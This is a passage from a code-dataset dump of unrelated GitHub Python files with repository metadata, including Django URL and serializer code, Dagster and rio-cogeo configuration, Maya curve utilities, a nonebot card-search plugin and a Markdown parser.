Line\n###############################################################################\n\n\ndef make_parser(inheritable=False):\n \"\"\"Expose parser for ``main``.\n\n Parameters\n ----------\n inheritable: bool\n whether the parser can be inherited from (default False).\n if True, sets ``add_help=False`` and ``conflict_hander='resolve'``\n\n Returns\n -------\n parser: ArgumentParser\n\n \"\"\"\n parser = argparse.ArgumentParser(\n description=\"fit_pm_scale\",\n add_help=~inheritable,\n conflict_handler=\"resolve\" if ~inheritable else \"error\",\n )\n\n # parser.add_argument(\n # \"figure_dir\",\n # type=str,\n # default=\"figures\",\n # help=\"The data directory\",\n # )\n # parser.add_argument(\n # \"--output_dir\",\n # type=str,\n # default=\"../../data\",\n # help=\"The data directory\",\n # )\n # parser.add_argument(\n # \"--data_dir\",\n # type=str,\n # default=\"data\",\n # help=\"The input data directory\",\n # )\n\n return parser\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n\ndef main(\n args: Optional[list] = None, opts: Optional[argparse.Namespace] = None\n):\n \"\"\"Script Function.\n\n Parameters\n ----------\n args : list, optional\n an optional single argument that holds the sys.argv list,\n except for the script name (e.g., argv[1:])\n opts : Namespace, optional\n pre-constructed results of parsed args\n if not None, used ONLY if args is None\n\n \"\"\"\n # deal with arguments\n if opts is not None and args is None:\n pass\n else:\n if opts is not None:\n warnings.warn(\"Not using `opts` because `args` are given\")\n parser = make_parser()\n opts = parser.parse_args(args)\n\n # get options\n # data_dir: str = opts.data_dir # where the data is stored\n # result_dir = str(\n # pathlib.Path(data_dir).parent\n # ) # where to store the formatted output\n\n # ensure paths end in '/'\n # data_dir = data_dir if data_dir.endswith(\"/\") else data_dir + \"/\"\n # result_dir = result_dir if result_dir.endswith(\"/\") else result_dir + \"/\"\n\n # read pr\n # testingoperty summary table\n summary = read_summary_table(DATA + \"summary.txt\")\n summary[\"pmscale\"] = np.NaN * u.mas / u.yr\n summary[\"pmscale_e\"] = np.NaN * u.mas / u.yr\n\n # globular clusters\n files = os.listdir(DATA + 'gcts')\n files = [f for f in files if f.endswith(\".txt\")]\n\n for file in tqdm.tqdm(files):\n\n name = file[: -len(\".txt\")] # GC name\n\n gc = read_globular_cluster_table(DATA + 'gcts/' + file)\n\n # compute scale parameter\n width_x, width_y, cov, labels, edges = scale_values_2d(\n name, gc, threshold=0.8, sigma=4\n )\n pm_scale, pm_scale_err, flag = average_scale_value(\n width_x, width_y, *edges\n )\n if flag:\n warnings.warn(name + \" raised the previous warning\")\n\n if np.isnan(pm_scale):\n warnings.warn(name + \" has NaN pm scale\")\n\n # write to table\n summary.loc[name][\"pmscale\"] = np.round(pm_scale, 3)\n summary.loc[name][\"pmscale_e\"] = np.round(pm_scale_err, 3)\n\n # # /for\n\n # save whole summary table\n summary.write(\n DATA + \"summary.txt\",\n format=\"ascii.commented_header\",\n overwrite=True,\n )\n\n return\n\n\n# /def\n\n\n# ------------------------------------------------------------------------\n\n# if __name__ == \"__main__\":\n\n# print(\"Running fit_pm_scale script.\")\n\n# main(args=None, opts=None)\n\n# print(\"finished.\")\n\n# # /if\n\n\n###############################################################################\n# 
END\n","repo_name":"nstarman/jas1101_project","sub_path":"jas1101finalproject/scripts/get_globular_clusters/fit_pm_scale.py","file_name":"fit_pm_scale.py","file_ext":"py","file_size_in_byte":12835,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"18413518063","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.homeview, name='home'),\n url(r'^feeds/$', views.ArticleListView.as_view(), name='feeds'),\n url(r'^feeds/category/version/$', views.VersionListView.as_view(), name='versionlist'),\n url(r'^feeds/category/tech/$', views.TechListView.as_view(), name='Techlist'),\n url(r'^feeds/category/review/$', views.ReviewListView.as_view(), name='Reviewlist'),\n url(r'^feeds/category/music&entertainment/$', views.MusicListView.as_view(), name='Musiclist'),\n url(r'^feeds/category/lifestyle/$', views.LifestyleListView.as_view(), name='Lifestylelist'), \n url(r'^feeds/tags/(?P<tag>\\w+)$',views.tagpage ,name='tagepage'),\n url(r'^archive/$', views.ArchiveView.as_view(), name=\"archive\"),\n url(r'search/$', views.search,name = 'search'),\n url(r'^feeds/(?P<slug>\\S+)$', views.ArticleDetailView.as_view(), name='detail'),\n \n]","repo_name":"PACHAELPHILLIP/version","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"4083853093","text":"import os\n\n#from dagster_aws.s3 import s3_resource\nfrom dagster_dbt import dbt_cli_resource\nfrom dagster_pyspark import pyspark_resource\n\nfrom dagster import ResourceDefinition\nfrom dagster.utils import file_relative_path\n\n#from .common_bucket_s3_pickle_io_manager import common_bucket_s3_pickle_io_manager\nfrom .duckdb_parquet_io_manager import duckdb_partitioned_parquet_io_manager\nfrom .hn_resource import hn_api_subsample_client, hn_api_client\nfrom .parquet_io_manager import (\n local_partitioned_parquet_io_manager,\n # s3_partitioned_parquet_io_manager,\n)\n#from .snowflake_io_manager import snowflake_io_manager\n\n#duck_db_path = file_relative_path(__file__, \"duckdb.local.duckdb\")\nDBT_PROJECT_DIR = file_relative_path(__file__, \"../../hacker_news_dbt\")\nDBT_PROFILES_DIR = DBT_PROJECT_DIR + \"/config\"\ndbt_local_resource = dbt_cli_resource.configured(\n # \"vars\": {\"duckdb_path\": duck_db_path}\n {\"profiles_dir\": DBT_PROFILES_DIR, \"project_dir\": DBT_PROJECT_DIR, \"target\": \"local\"}\n)\n#dbt_staging_resource = dbt_cli_resource.configured(\n# {\"profiles-dir\": DBT_PROFILES_DIR, \"project-dir\": DBT_PROJECT_DIR, \"target\": \"staging\"}\n#)\n#dbt_prod_resource = dbt_cli_resource.configured(\n# {\"profiles_dir\": DBT_PROFILES_DIR, \"project_dir\": DBT_PROJECT_DIR, \"target\": \"prod\"}\n#)\n\n\nconfigured_pyspark = pyspark_resource.configured(\n {\n \"spark_conf\": {\n \"spark.jars.packages\": \",\".join(\n [\n #\"net.snowflake:snowflake-jdbc:3.8.0\",\n #\"net.snowflake:spark-snowflake_2.12:2.8.2-spark_3.0\",\n #\"com.amazonaws:aws-java-sdk:1.7.4,org.apache.hadoop:hadoop-aws:2.7.7\",\n ]\n ),\n #\"spark.hadoop.fs.s3.impl\": \"org.apache.hadoop.fs.s3native.NativeS3FileSystem\",\n #\"spark.hadoop.fs.s3.awsAccessKeyId\": os.getenv(\"AWS_ACCESS_KEY_ID\", \"\"),\n #\"spark.hadoop.fs.s3.awsSecretAccessKey\": os.getenv(\"AWS_SECRET_ACCESS_KEY\", \"\"),\n #\"spark.hadoop.fs.s3.buffer.dir\": \"/tmp\",\n }\n }\n)\n\n\n# snowflake_io_manager_prod = snowflake_io_manager.configured({\"database\": 
\"DEMO_DB_ASSETS\"})\n\n# RESOURCES_PROD = {\n# \"s3_bucket\": ResourceDefinition.hardcoded_resource(\"hackernews-elementl-prod\"),\n# \"io_manager\": common_bucket_s3_pickle_io_manager,\n# \"s3\": s3_resource,\n# \"parquet_io_manager\": s3_partitioned_parquet_io_manager,\n# \"warehouse_io_manager\": snowflake_io_manager_prod,\n# \"pyspark\": configured_pyspark,\n# \"warehouse_loader\": snowflake_io_manager_prod,\n# \"hn_client\": hn_api_subsample_client.configured({\"sample_rate\": 10}),\n# \"dbt\": dbt_prod_resource,\n# }\n\n# snowflake_io_manager_staging = snowflake_io_manager.configured(\n# {\"database\": \"DEMO_DB_ASSETS_STAGING\"}\n# )\n\n\n# RESOURCES_STAGING = {\n# \"s3_bucket\": ResourceDefinition.hardcoded_resource(\"hackernews-elementl-dev\"),\n# \"io_manager\": common_bucket_s3_pickle_io_manager,\n# \"s3\": s3_resource,\n# \"parquet_io_manager\": s3_partitioned_parquet_io_manager,\n# \"warehouse_io_manager\": snowflake_io_manager_staging,\n# \"pyspark\": configured_pyspark,\n# \"warehouse_loader\": snowflake_io_manager_staging,\n# \"hn_client\": hn_api_subsample_client.configured({\"sample_rate\": 10}),\n# \"dbt\": dbt_staging_resource,\n# }\n\nRESOURCES_LOCAL = {\n \"parquet_io_manager\": local_partitioned_parquet_io_manager,\n #\"warehouse_io_manager\": duckdb_partitioned_parquet_io_manager.configured(\n # {\"duckdb_path\": duck_db_path}\n #),\n \"warehouse_io_manager\": duckdb_partitioned_parquet_io_manager.configured(\n {\"duckdb_path\": os.path.join(DBT_PROJECT_DIR, \"hackernews.duckdb\")},\n ),\n \"pyspark\": configured_pyspark,\n #\": snowflake_io_manager_prod,\n #\"hn_client\": hn_api_subsample_client.configured({\"sample_rate\": 10}),\n \"hn_client\": hn_api_client,\n \"dbt\": dbt_local_resource,\n}\n","repo_name":"geoHeil/dagster-asset-demo","sub_path":"hacker_news_assets/hacker_news_assets/resources/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"} +{"seq_id":"5336317090","text":"#------------------------------------------------------------------- HEADER ---\n# Title: \n# Descr: \n#\n# Author: Ryan Porter\n# Date: 2013.08.13 \n# Version: 0.1\n#\n#------------------------------------------------------------------------------\n\n#------------------------------------------------------------------ IMPORTS ---\n# Built-in\nimport os.path\n\n# Third Part\nimport maya.cmds as cmds\nimport maya.mel as mel\n\n#---------------------------------------------------------------- FUNCTIONS ---\n\ndef serializeCurves(nurbs_curves):\n ''' \n Return an list of MEL setAttr commands that will create the shape defined\n by 'nurbs_curves' when executed. Each command has a '%s' string formatting\n token that must be formatted with the name of the shape object when run.\n \n ARGUMENTS:\n nurbs_curves - [list] of nurbsCurves Maya objects\n \n RETURNS: [list] of MEL commands\n '''\n \n if not isinstance(nurbs_curves, list):\n raise TypeError(\"nurbs_curves must be a list of nurbsCurve objects\")\n \n for crv in nurbs_curves:\n if not cmds.objectType(crv, isType=\"nurbsCurve\"):\n raise TypeError(\"nurbs_curves must be a list of nurbsCurve objects\")\n \n result = []\n \n for crv in nurbs_curves:\n result.append(serializeCurve(crv))\n \n return result\n\ndef serializeCurve(crv):\n '''\n Return a MEL setAttr command that will create the shape defined by 'crv'\n when executed. 
This command has a '%s' string formatting token that must be\n formatted with the name of the shape object when run.\n \n ARGUMENTS:\n crv - [str] a nurbsCurve Maya object\n \n RETURNS: [str] a MEL command\n '''\n \n if not cmds.objectType(crv, isType=\"nurbsCurve\"):\n raise TypeError(\"crv must be a nurbsCurve object\")\n \n cmd = []\n \n crv_info = cmds.createNode('curveInfo', ss=True)\n cmds.connectAttr(\"%s.worldSpace\" % crv, \"%s.inputCurve\" % crv_info)\n knots = cmds.getAttr(\"%s.knots\" % crv_info)[0]\n num_knots = len(knots)\n cmds.delete(crv_info)\n \n degree = cmds.getAttr(\"%s.degree\" % crv)\n spans = cmds.getAttr(\"%s.spans\" % crv)\n form = cmds.getAttr(\"%s.form\" % crv)\n \n num_cvs = degree + spans\n cvs = []\n \n for i in range(num_cvs):\n cv = cmds.xform(\"%s.cv[%s]\" % (crv, i), q=True, os=True, t=True)\n \n cvs.append(cv)\n \n cmd.append('setAttr \"%s.cc\" - type \"nurbsCurve\"')\n cmd.append('%s %s %s no 3' % (degree, spans, form))\n cmd.append('%s' % num_knots)\n \n for k in knots:\n cmd.append('%s' % int(k))\n \n cmd.append('%s' % num_cvs)\n \n for cv in cvs:\n for c in cv:\n cmd.append(str(c)) \n \n return ' '.join(cmd)","repo_name":"MagSec-Arts/maya_tools","sub_path":"curvetool/curve_utils.py","file_name":"curve_utils.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"37431764354","text":"# Ejercicio tomado del libro de Burden, Análisis numérico apartado 10.2, ejercicio 3 inciso c\r\n\r\nfrom math import cos, sin, pi, exp, sqrt\r\nimport numpy as np\r\n\r\n# introducir valores que se evualaran de la funcion\r\ndef Fs(x1, x2, x3):\r\n f1 = 3*x1-cos(x2*x3)-1/2\r\n f2 = x1**2-81*(x2+0.1)**2+sin(x3)+1.06\r\n f3 = exp(-x1*x2)+20*x3+(10*pi-3)/3\r\n return np.matrix([[f1], [f2], [f3]])\r\n\r\n#Matriz Jacobiana\r\ndef JInv(x1, x2, x3):\r\n J = np.matrix([[3, x3*sin(x2*x3), x2*sin(x2*x3)], [2*x1, -162*(x2+0.1), cos(x3)], [-x2*exp(-x1*x2), -x1*exp(-x1*x2), 20]])\r\n JV = np.linalg.inv(J)\r\n return [J, JV]\r\n\r\ndef RhapsonMulti(x1, x2, x3, P0, k, tolerancia):\r\n print(\"k \\t x1 \\t \\t x2 \\t \\t x3 \\t \\t (x(k)-x(k-1)\")\r\n print(\"{0:1d} \\t {1:1.4f} \\t {2:1.4f} \\t {3:1.4f} \\t\".format(k, x1, x2, x3))\r\n\r\n while k < 10:\r\n # Calcular vector F y matriz Jacobiana\r\n J, JI = JInv(x1, x2, x3)\r\n F = Fs(x1, x2, x3)\r\n Y = -JI * F\r\n # Vector x\r\n X = np.matrix(P0).T + Y\r\n\r\n # Actualizando valores\r\n x1, x2, x3 = float(X[0][0]), float(X[1][0]), float(X[2][0])\r\n\r\n # Calculo de la magnitud del vector\r\n magnitud = sqrt((x1 - P0[0]) ** 2 + (x2 - P0[1]) ** 2 + (x3 - P0[2]) ** 2)\r\n\r\n # Redifinir P0\r\n P0 = [x1, x2, x3]\r\n k += 1\r\n print(\"{0:1d} \\t {1:1.6f} \\t {2:1.6f} \\t {3:1.6f} \\t {4:1.6f}\".format(k, x1, x2, x3, magnitud))\r\n\r\n # Calcular magnitud del vector \"Y\" y aplicar la tolerancia\r\n if sqrt(Y[0][0] ** 2 + Y[1][0] ** 2 + Y[2][0] ** 2) < Tolerancia:\r\n print(\"Cálculo exitoso:)\")\r\n break\r\n\r\n\r\n#Aproximacion lineal\r\nP0 = [0.1, 0.1, -0.1]\r\n\r\n# Valores de aproximacion por separado\r\nx1, x2, x3 = P0\r\n\r\n# valor de k\r\nk= 0\r\n\r\nTolerancia = 0.0000000001\r\n\r\n# Llamada de la funcion con sus respectivos parametros\r\nRhapsonMulti(x1, x2, x3, P0, k, Tolerancia)","repo_name":"ZahidGSJ/Metodos-numericos-Python","sub_path":"Python/Ecuaciones no 
lineales/RhapsonMultiVariable.py","file_name":"RhapsonMultiVariable.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7621975313","text":"\nfrom rest_framework import serializers\n\n# Models\nfrom apps.products.models import Product, ProductImage\nfrom apps.reviews.models import Review\n\n# Product Image Serializer\nfrom .ProductImageSerializer import ProductImageSerializer\n\n# Utilities\nfrom apps.reviews.utils import calculate_avg_rating\n\n# Product Serializer\nclass ProductSerializer(serializers.ModelSerializer):\n # Product Images\n product_images = serializers.SerializerMethodField()\n\n # Number of reviews\n review_ratings = serializers.SerializerMethodField()\n\n class Meta:\n model = Product\n\n # Fieldnames\n fields = [\n \"id\",\n \"title\",\n \"description\",\n \"quantity\",\n \"price\",\n \"review_ratings\",\n \"product_images\"\n ]\n # Retrieves all review ratings with the associated product\n # Args:\n # self: class\n # product: Product\n # Return\n # Review rating object that contains the number of reviews and the average rating\n def get_review_ratings(self, product):\n # Query set for reviews associated with the product\n queryset = Review.objects.filter(product=product.id)\n\n # Calculates the average rating\n avg_rating = calculate_avg_rating(queryset)\n\n return {\"total_reviews\":len(queryset), \"avg_rating\": avg_rating}\n\n\n def get_product_images(self, product):\n # Query set for product images\n queryset = ProductImage.objects.filter(product=product.id)\n\n # Product images\n product_images = [ProductImageSerializer(product_image).data for product_image in queryset]\n\n return product_images","repo_name":"EgorUshakovOfficial/ecommerce-project","sub_path":"server/project/apps/products/serializers/ProductSerializer.py","file_name":"ProductSerializer.py","file_ext":"py","file_size_in_byte":1653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14907560368","text":"import json\n\nimport nonebot\nfrom nonebot.params import CommandArg\n\nfrom nonebot.permission import SUPERUSER\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.onebot.v11 import Event, Bot, GroupMessageEvent, PrivateMessageEvent, GROUP_ADMIN, \\\n GROUP_OWNER\nfrom nonebot import on_command\n\nfrom nonebot_plugin_ocgbot_v2.libraries.Card import getCard, getRandomCard\nfrom nonebot_plugin_ocgbot_v2.libraries.searchManage import SearchManager\nfrom nonebot_plugin_ocgbot_v2.libraries.sendAction import *\nfrom nonebot_plugin_ocgbot_v2.libraries.randomManage import RandomManager\n\npm = RandomManager()\nsm = SearchManager()\n\n\n# ==========工具变量、方法=============================\n\n\ndef verifySid(sid: str):\n try:\n sType, sId = sid.split('_')\n if sType in ['group', 'user']:\n if sId.isdigit():\n return True\n return False\n except:\n return False\n\n\n# ===============功能==================================================\n\n\nsearch_card = on_command(\"查卡\", aliases={\"ck\", \"CK\"})\n\n\n@search_card.handle()\nasync def _(bot: Bot, event: Event, state: T_State, args: Message = CommandArg()):\n if isinstance(event, PrivateMessageEvent):\n sessionId = 'user_' + str(event.user_id)\n if isinstance(event, GroupMessageEvent):\n sessionId = 'group_' + str(event.group_id)\n regex = \"(.+) ([0-9]+)?\"\n text = str(args).strip()\n if text == \"\":\n await search_card.finish(\"请输入需要查询的卡名\")\n match = re.match(regex, text)\n try:\n search_group 
= match.groups()\n if search_group[1] is None:\n raise Exception()\n except:\n text = text + \" 1\"\n search_group = re.match(regex, text).groups()\n try:\n state['name'] = search_group[0]\n state['page'] = search_group[1]\n js = getCard(state['name'], state['page'])\n except Exception as e:\n await search_card.finish(\"咿呀?查询失败了呢\")\n if int(search_group[1]) > int(js.pageNum):\n await search_card.finish(\"页码超出最大值\" + \"`\" + str(js.pageNum) + \"`\")\n state['js'] = js\n if js.amount == 0:\n await sendNosearch(search_card)\n elif isinstance(event, PrivateMessageEvent):\n await send2(js, search_card)\n elif isinstance(event, GroupMessageEvent):\n typee = sm.CheckType(sessionId)\n state['send_type'] = typee\n if typee == 1:\n await send2(js, search_card)\n elif typee == 2:\n await send(js, bot, event, search_card)\n else:\n await send3(js, search_card)\n\n\n@search_card.got(\"text\", prompt=\"欧尼酱~输入任意语句或选择任意卡牌结束本次查卡~\")\nasync def _(bot: Bot, event: Event, state: T_State):\n text = str(state['text'])\n js = state['js']\n if text.isdigit():\n if isinstance(event, PrivateMessageEvent):\n typee = 1\n elif isinstance(event, GroupMessageEvent):\n typee = int(state['send_type'])\n len = int(js.amount)\n chose = int(text)\n if 1 <= chose <= len:\n if typee == 1:\n await send2(js, search_card, chose)\n elif typee == 2:\n await send(js, bot, event, search_card, chose)\n else:\n await send3(js, search_card, chose)\n else:\n name = state['name']\n page = int(state['page'])\n flag = None\n if text == \"下一页\":\n if page == js.pageNum:\n await search_card.reject(\"欧尼酱~已经到最后一页了~\")\n else:\n page = page + 1\n state['page'] = page\n flag = 1\n elif text == \"上一页\":\n if page == 1:\n await search_card.reject(\"欧尼酱~已经是第一页了~\")\n else:\n page = page - 1\n state['page'] = page\n flag = 1\n else:\n await search_card.finish()\n if flag is not None:\n js = getCard(name, str(page))\n state['js'] = js\n if js.amount == 0:\n await sendNosearch(search_card)\n elif isinstance(event, PrivateMessageEvent):\n await send2(js, search_card)\n elif isinstance(event, GroupMessageEvent):\n typee = state['send_type']\n if typee == 1:\n await send2(js, search_card)\n elif typee == 2:\n await send(js, bot, event, search_card)\n else:\n await send3(js, search_card)\n await search_card.reject(\"\")\n\n\nrandomCard = on_command('随机一卡', aliases={'抽一张卡'})\n\n\n@randomCard.handle()\nasync def _(bot: Bot, event: Event, state: T_State):\n groupSession = None\n sessionId = None\n if isinstance(event, PrivateMessageEvent):\n sessionId = 'user_' + str(event.user_id)\n userType = 'private'\n if isinstance(event, GroupMessageEvent):\n groupSession = 'group_' + str(event.group_id)\n sessionId = 'user_' + str(event.sender.user_id)\n userType = 'group'\n try:\n userType = 'SU' if (str(event.user_id) in nonebot.get_driver().config.superusers) else userType\n pm.CheckPermission(sessionId, groupSession, userType)\n except PermissionError as e:\n await randomCard.finish(str(e))\n try:\n js = getRandomCard()\n pm.UpdateLastSend(sessionId)\n except Exception as e:\n await randomCard.finish(\"咿呀?卡组被送进异次元了呢~\")\n await send3(js, randomCard)\n\n\n# ==========各类开关=============================\n\n# ----- 抽卡cd时间更新 -----\nrandom_cd = on_command(\"抽卡cd\", permission=GROUP_ADMIN | GROUP_OWNER | SUPERUSER, block=True, priority=10)\n\n\n# 获取参数\n@random_cd.handle()\nasync def cmdArg(bot: Bot, event: Event, state: T_State, arg: Message = CommandArg()):\n message = str(arg).replace(\" \", \"\")\n try:\n state['cdTime'] = int(str(message))\n except:\n await 
random_cd.finish(f'无效参数: {message}, 请输入 正整数 或 0 为参数')\n\n\n# 群聊部分自动获取sid\n@random_cd.handle()\nasync def group(bot: Bot, event: GroupMessageEvent, state: T_State):\n sid = 'group_' + str(event.group_id)\n if not verifySid(sid):\n await random_cd.reject(f\"无效目标对象: {sid}\")\n await random_cd.finish(pm.UpdateCd(sid, state['cdTime']))\n\n\n# 抽卡开关\nckpem = on_command(\"抽卡功能\", permission=GROUP_ADMIN | GROUP_OWNER | SUPERUSER)\n\n\n@ckpem.handle()\nasync def cmdArg(bot: Bot, event: Event, state: T_State, message: Message = CommandArg()):\n if 'off' in str(message):\n state['add_mode'] = True\n elif 'on' in str(message):\n state['add_mode'] = False\n else:\n await ckpem.finish(f'无效参数: {message}, 请输入 on 或 off 为参数')\n\n\n# 群聊部分自动获取sid\n@ckpem.handle()\nasync def group(bot: Bot, event: GroupMessageEvent, state: T_State):\n state['sid'] = 'group_' + str(event.group_id)\n sid = str(state['sid'])\n if not verifySid(sid):\n await ckpem.reject(f\"无效目标对象: {sid}\")\n await ckpem.finish(pm.UpdateBanList(sid, state['add_mode']))\n\n\n# 查卡方式\nsearchType = on_command(\"查卡方式\")\n\n\n@searchType.handle()\nasync def seartype(bot: Bot, event: GroupMessageEvent, state: T_State, args: Message = CommandArg()):\n message = str(args)\n state['sid'] = 'group_' + str(event.group_id)\n sid = str(state['sid'])\n if message.isdigit():\n if not verifySid(sid):\n await searchType.reject(f\"无效目标对象: {sid}\")\n await searchType.finish(sm.UpdateSearchType(sid, int(message)))\n else:\n await searchType.finish(\"请选择正确的方式\")\n","repo_name":"fireinsect/nonebot-plugin-ocgbot-v2","sub_path":"nonebot_plugin_ocgbot_v2/ocg.py","file_name":"ocg.py","file_ext":"py","file_size_in_byte":7751,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"16"} +{"seq_id":"28485496859","text":"\"\"\"Rio_cogeo.scripts.cli.\"\"\"\n\nimport os\n\nimport click\nimport numpy\n\nfrom rasterio.rio import options\nfrom rasterio.enums import Resampling\n\nfrom rio_cogeo.cogeo import cog_translate, cog_validate\nfrom rio_cogeo.profiles import cog_profiles\n\n\nclass BdxParamType(click.ParamType):\n \"\"\"Band inddex type.\"\"\"\n\n name = \"bidx\"\n\n def convert(self, value, param, ctx):\n \"\"\"Validate and parse band index.\"\"\"\n try:\n bands = [int(x) for x in value.split(\",\")]\n assert all(b > 0 for b in bands)\n return bands\n\n except (ValueError, AttributeError, AssertionError):\n raise click.ClickException(\n \"bidx must be a string of comma-separated integers (> 0), \"\n \"representing the band indexes.\"\n )\n\n\nclass NodataParamType(click.ParamType):\n \"\"\"Nodata inddex type.\"\"\"\n\n name = \"nodata\"\n\n def convert(self, value, param, ctx):\n \"\"\"Validate and parse band index.\"\"\"\n try:\n if value.lower() == \"nan\":\n return numpy.nan\n elif value.lower() in [\"nil\", \"none\", \"nada\"]:\n return None\n else:\n return float(value)\n except (TypeError, ValueError):\n raise click.ClickException(\"{} is not a valid nodata value.\".format(value))\n\n\n@click.group(short_help=\"Create and Validate COGEO\")\ndef cogeo():\n \"\"\"Rasterio cogeo subcommands.\"\"\"\n pass\n\n\n@cogeo.command(short_help=\"Create COGEO\")\n@options.file_in_arg\n@options.file_out_arg\n@click.option(\"--bidx\", \"-b\", type=BdxParamType(), help=\"Band indexes to copy.\")\n@click.option(\n \"--cog-profile\",\n \"-p\",\n \"cogeo_profile\",\n type=click.Choice(cog_profiles.keys()),\n default=\"deflate\",\n help=\"CloudOptimized GeoTIFF profile (default: deflate).\",\n)\n@click.option(\n \"--nodata\",\n type=NodataParamType(),\n 
metavar=\"NUMBER|nan\",\n help=\"Set nodata masking values for input dataset.\",\n)\n@click.option(\n \"--add-mask\",\n is_flag=True,\n help=\"Force output dataset creation with an internal mask (convert alpha band or nodata to mask).\",\n)\n@click.option(\n \"--overview-level\",\n type=int,\n help=\"Overview level (if not provided, appropriate overview level will be selected until the smallest overview is smaller than the internal block size).\",\n)\n@click.option(\n \"--overview-resampling\",\n help=\"Resampling algorithm.\",\n type=click.Choice(\n [it.name for it in Resampling if it.value in [0, 1, 2, 3, 4, 5, 6, 7]]\n ),\n default=\"nearest\",\n)\n@click.option(\n \"--overview-blocksize\",\n default=lambda: os.environ.get(\"GDAL_TIFF_OVR_BLOCKSIZE\", 128),\n help=\"Overview's internal tile size (default defined by GDAL_TIFF_OVR_BLOCKSIZE env or 128)\",\n)\n@click.option(\"--threads\", type=int, default=8)\n@options.creation_options\n@click.option(\n \"--quiet\",\n \"-q\",\n help=\"Suppress progress bar and other non-error output.\",\n is_flag=True,\n)\ndef create(\n input,\n output,\n bidx,\n cogeo_profile,\n nodata,\n add_mask,\n overview_level,\n overview_resampling,\n overview_blocksize,\n threads,\n creation_options,\n quiet,\n):\n \"\"\"Create Cloud Optimized Geotiff.\"\"\"\n output_profile = cog_profiles.get(cogeo_profile)\n output_profile.update(dict(BIGTIFF=os.environ.get(\"BIGTIFF\", \"IF_SAFER\")))\n if creation_options:\n output_profile.update(creation_options)\n\n config = dict(\n NUM_THREADS=threads,\n GDAL_TIFF_INTERNAL_MASK=os.environ.get(\"GDAL_TIFF_INTERNAL_MASK\", True),\n GDAL_TIFF_OVR_BLOCKSIZE=str(overview_blocksize),\n )\n\n cog_translate(\n input,\n output,\n output_profile,\n bidx,\n nodata,\n add_mask,\n overview_level,\n overview_resampling,\n config,\n quiet,\n )\n\n\n@cogeo.command(short_help=\"Validate COGEO\")\n@options.file_in_arg\ndef validate(input):\n \"\"\"Validate Cloud Optimized Geotiff.\"\"\"\n if cog_validate(input):\n click.echo(\"{} is a valid cloud optimized GeoTIFF\".format(input))\n else:\n click.echo(\"{} is NOT a valid cloud optimized GeoTIFF\".format(input))\n","repo_name":"ryanjdillon/rio-cogeo","sub_path":"rio_cogeo/scripts/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"} +{"seq_id":"14557795807","text":"from typing import Optional, Iterable\nimport yaml\n\ntry: # Assume we're a submodule in a package.\n import classes as cs\nexcept ImportError: # Apparently no higher-level package has been imported, fall back to a local import.\n from . 
import classes as cs\n\n\nDEFAULT_RULES = {\n 'max_header_level': 2,\n}\nSPACE = ' '\nINDENT_STEP = 4\nMARKERS = ('*', '-', '+', '>', '&', 'i', '=')\nSKIP_MARKERS = ('0', 'x')\nNAME_DIVIDERS = (':', ' - ')\nMAX_WORDS_IN_NAME = 5\n\n\ndef split_lines(text):\n iterable_text = [text] if isinstance(text, str) else text\n for line in iterable_text:\n for subline in line.split('\\n'):\n if subline != '':\n yield subline\n\n\ndef str_has_indent(text):\n if len(text) > INDENT_STEP:\n if text.startswith(SPACE * INDENT_STEP):\n return True\n return False\n\n\ndef transliterate(text):\n symbols = (u\"абвгдеёжзийклмнопрстуфхцчшщъыьэюяАБВГДЕЁЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯ\",\n u\"abvgdeejzijklmnoprstufhzcss_y_euaABVGDEEJZIJKLMNOPRSTUFHZCSS_Y_EUA\")\n tr = {ord(a): ord(b) for a, b in zip(*symbols)}\n return text.translate(tr)\n\n\nclass Paragraph(object):\n def __init__(\n self,\n text,\n level=0,\n adjust_level=True,\n ):\n self.text = text\n self.level = level\n if adjust_level:\n self.adjust_level()\n\n def get_line(self):\n return SPACE * INDENT_STEP * self.level + self.text\n\n def set_line(self, text):\n self.text = str(text)\n self.adjust_level()\n\n def has_indent(self):\n return str_has_indent(self.text)\n\n def adjust_level(self):\n while str_has_indent(self.text):\n self.level += 1\n self.text = self.text[INDENT_STEP:]\n\n def get_mark(self, standard_only=True):\n if len(self.text) > 2:\n if self.text[1] == SPACE:\n marker = self.text[0]\n if marker in MARKERS or marker in SKIP_MARKERS or not standard_only:\n return marker\n\n def get_text_without_marks(self):\n if self.get_mark():\n return self.text[2:]\n else:\n return self.text\n\n def get_markdown(self, rules=DEFAULT_RULES):\n max_header_level = rules.get('max_header_level')\n if self.level + 1 <= max_header_level:\n markdown_line = '#' * (self.level + 1) + ' ' + self.get_text_without_marks()\n else:\n markdown_line = SPACE * (self.level - max_header_level) * INDENT_STEP + self.text\n return [markdown_line]\n\n def get_tag(self):\n text = self.get_text_without_marks() + ' '\n if text.startswith('['):\n closed_scope_position = text.find('] ')\n if closed_scope_position > 2:\n tag = text[1: closed_scope_position]\n tag = tag.lower()\n tag.replace(SPACE, '_')\n return tag\n\n def get_text_without_marks_and_tags(self):\n tag = self.get_tag()\n if tag:\n return self.get_text_without_marks()[len(tag) + 3:]\n else:\n return self.get_text_without_marks()\n\n def has_name(self):\n text = self.get_text_without_marks_and_tags()\n if (text or SPACE)[0] == '(':\n closed_scope_position = text.find(')')\n if closed_scope_position > 2:\n return text[1: closed_scope_position]\n for divider in NAME_DIVIDERS:\n if divider in text:\n text = text.split(divider)[0]\n if len(text) < 